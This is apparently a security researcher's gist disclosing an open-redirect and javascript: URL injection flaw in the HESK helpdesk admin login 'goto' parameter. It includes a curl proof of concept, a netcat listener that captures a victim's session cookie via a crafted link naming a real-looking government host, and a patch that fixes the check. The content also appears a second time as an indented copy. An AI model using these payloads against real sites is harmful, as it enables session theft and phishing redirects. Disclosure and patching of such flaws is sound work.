cedriczirtacic/attack

## attack
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13

<h1>TEST</h1>

## gistfile1.txt
Basically is the same bug but there's more than one way to exploit it.

There is a positive side of this: both of this proof-of-concepts are difficult to exploit because of how you code it and browser-side protections.

I will make more tests but this is what I've found so far.

## gistfile2.txt
(#) Javascript Injection via CWE-601 (CWE-89):

http://www.website.com/admin/index.php?goto=javascript:alert(0)

(#) Response:

[root@server www]# curl -v 'http://www.website.com/admin/index.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=test&pass=test123&remember_u
ser=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29' --compressed
* About to connect() to www.website.com port 80
*   Trying 10.73.2.4... connected
* Connected to www.website.com (10.73.2.4) port 80
> POST /admin/index.php HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: www.website.com
> Accept: */*
> Accept-Encoding: deflate, gzip
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 89
>
> user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29HTTP/1.1 302 Found
< Date: Tue, 05 Aug 2014 15:23:48 GMT
< Server: Apache/2.2.3 (Red Hat)
< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=i2llpc6hd2hkksbbr4qttr5n86; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=pq6k294tm4u93n9gfvn5gm0in7; path=/
< Set-Cookie: hesk_username=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
< Set-Cookie: hesk_p=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
< Location: javascript:alert(0)
< Content-Length: 153
< Connection: close
< Content-Type: text/html; charset=UTF-8

## gistfile3.txt
(#) URL Redirection (CWE-601):

This one is more difficult to exploit because it relies on what you have setted as $hesk_settings['hesk_url'].
Lets say that a user gained access/can execute a command as any user (it doesn't have to be super user) the he can manipulate via the same _goto_ parameter the reponse and/or obtain the request header (including the cookie value) and gain the users' access:


(#) Proof-Of-Concept:

(1) Attacker creates a "server" listening in port 1337 with a response inside the "attack" file:

[root@server www]# nc -l 1337 -v < attack

(2) Sends a user the link: http://prehesk.hacienda-gcba.gov.ar/admin/index.php?goto=http://prehesk.hacienda-gcba.gov.ar:1337

(3.1) The attacker receives the request header with the users' data:

[root@server www]# nc -l 1337 -v < attack
Connection from 10.73.10.217 port 1337 [tcp/menandmice-dns] accepted
GET / HTTP/1.1
Host: www.website.com:1337
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
Referer: http://www.website.com/admin/index.php?goto=http://www.website.com:1337
Accept-Encoding: gzip,deflate,sdch
Accept-Language: es-419,es;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=ausbcabgb32v3b6s0bg3pk3071

(3.2) The user receives the special response written by the attacker. It can also contain HTML/Javascript code or another "Location" header to redirect the user to another server.


## index.patch
--- index.php.old       2014-08-05 14:22:30.000000000 -0300
+++ index.php   2014-08-05 14:28:08.000000000 -0300
@@ -239,7 +239,8 @@

         if (isset($myurl['host']) && isset($goto['host']))
         {
-               if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) )
+               if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) || isset($goto['port'])
+                       || (isset($goto['scheme']) && !preg_match('/^https*$/', $goto['scheme'])) )
             {
                $url = 'admin_main.php';
             }
	HTTP/1.1 200 OK
	Server: test
	Content-Type: text/html; charset=UTF-8
	Date: Tue, 05 Aug 2014 14:42:52 GMT
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	Pragma: no-cache
	Content-Length: 13

	<h1>TEST</h1>
	Basically is the same bug but there's more than one way to exploit it.

	There is a positive side of this: both of this proof-of-concepts are difficult to exploit because of how you code it and browser-side protections.

	I will make more tests but this is what I've found so far.
	(#) Javascript Injection via CWE-601 (CWE-89):

	http://www.website.com/admin/index.php?goto=javascript:alert(0)

	(#) Response:

	[root@server www]# curl -v 'http://www.website.com/admin/index.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=test&pass=test123&remember_u
	ser=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29' --compressed
	* About to connect() to www.website.com port 80
	* Trying 10.73.2.4... connected
	* Connected to www.website.com (10.73.2.4) port 80
	> POST /admin/index.php HTTP/1.1
	> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
	> Host: www.website.com
	> Accept: /
	> Accept-Encoding: deflate, gzip
	> Content-Type: application/x-www-form-urlencoded
	> Content-Length: 89
	>
	> user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29HTTP/1.1 302 Found
	< Date: Tue, 05 Aug 2014 15:23:48 GMT
	< Server: Apache/2.2.3 (Red Hat)
	< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=i2llpc6hd2hkksbbr4qttr5n86; path=/
	< Expires: Thu, 19 Nov 1981 08:52:00 GMT
	< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	< Pragma: no-cache
	< P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
	< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=pq6k294tm4u93n9gfvn5gm0in7; path=/
	< Set-Cookie: hesk_username=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
	< Set-Cookie: hesk_p=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
	< Location: javascript:alert(0)
	< Content-Length: 153
	< Connection: close
	< Content-Type: text/html; charset=UTF-8
	(#) URL Redirection (CWE-601):

	This one is more difficult to exploit because it relies on what you have setted as $hesk_settings['hesk_url'].
	Lets say that a user gained access/can execute a command as any user (it doesn't have to be super user) the he can manipulate via the same _goto_ parameter the reponse and/or obtain the request header (including the cookie value) and gain the users' access:


	(#) Proof-Of-Concept:

	(1) Attacker creates a "server" listening in port 1337 with a response inside the "attack" file:

	[root@server www]# nc -l 1337 -v < attack

	(2) Sends a user the link: http://prehesk.hacienda-gcba.gov.ar/admin/index.php?goto=http://prehesk.hacienda-gcba.gov.ar:1337

	(3.1) The attacker receives the request header with the users' data:

	[root@server www]# nc -l 1337 -v < attack
	Connection from 10.73.10.217 port 1337 [tcp/menandmice-dns] accepted
	GET / HTTP/1.1
	Host: www.website.com:1337
	Connection: keep-alive
	Cache-Control: max-age=0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
	Referer: http://www.website.com/admin/index.php?goto=http://www.website.com:1337
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: es-419,es;q=0.8,en-US;q=0.6,en;q=0.4
	Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=ausbcabgb32v3b6s0bg3pk3071

	(3.2) The user receives the special response written by the attacker. It can also contain HTML/Javascript code or another "Location" header to redirect the user to another server.
	--- index.php.old 2014-08-05 14:22:30.000000000 -0300
	+++ index.php 2014-08-05 14:28:08.000000000 -0300
	@@ -239,7 +239,8 @@

	if (isset($myurl['host']) && isset($goto['host']))
	{
	- if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) )
	+ if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) \|\| isset($goto['port'])
	+ \|\| (isset($goto['scheme']) && !preg_match('/^https*$/', $goto['scheme'])) )
	{
	$url = 'admin_main.php';
	}